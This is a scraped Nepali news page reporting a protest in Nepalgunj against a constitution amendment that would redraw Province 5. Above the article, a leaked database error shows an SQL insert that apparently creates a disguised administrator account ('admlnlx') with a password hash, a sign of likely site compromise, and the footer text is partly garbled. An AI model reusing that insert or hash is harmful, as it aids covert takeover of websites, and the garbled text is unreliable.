WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3uEuZfIP1.eQUjVv6ypLlWoZk711j/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:58:16', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
संविधान संशोधन विरुद्ध नेपालगन्जमा मधेशी थारु सहितको विरोध प्रर्दशन (तस्विर सहित) – Gaule Khabar

संविधान संशोधन विरुद्ध नेपालगन्जमा मधेशी थारु सहितको विरोध प्रर्दशन (तस्विर सहित)

संविधान संशोधन विरुद्ध नेपालगन्जमा मधेशी थारु सहितको विरोध प्रर्दशन (तस्विर सहित)

नेपालगन्ज,मंसिर २६-

संविधान संशोधन र ५ नम्बर प्रदेशको सिमाङकन हेरफेर गर्ने गरी प्रस्तुत बिधेयकको बिरोध गर्दै एमाले कार्यकर्ता लगायत मधेशी र थारु समूदायले नेपालगन्जमा बिरोध प्रर्दशन गरेका छन् । आइतबार ठूलो सख्यामा भेला भएका एमाले समर्थकहरुको बिरोध र्यालि प्रर्दशन गरेका हुन् ।

र्यालि नेपालगन्ज स्थित वीपी चोक, बिरेन्द्र चोक हुदै पुष्पलाल चोक पुगेर बिरोध सभामा परिणत भएको थियो । बिरोध सभालाइ सबोधन गर्दै एमाले नेताहरुले संबिधान सशोधन प्रस्ताव बिरुद्ध ५ नम्बर प्रदेशका सबै जिल्लामा आन्दोलन अझै चर्काउने बताएका छन् । ५ नम्बर प्रदेशका सिमाङकन हेरफेर गर्ने प्रस्ताव बिरुद्ध नेपाली काग्रेस र नेकपा माओवादी केन्द्रका केही नेताहरु पनि आन्दोलनमा उत्रेका छन् ।

uml andolan

uml birod

uml birod bankeuml birod banke

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका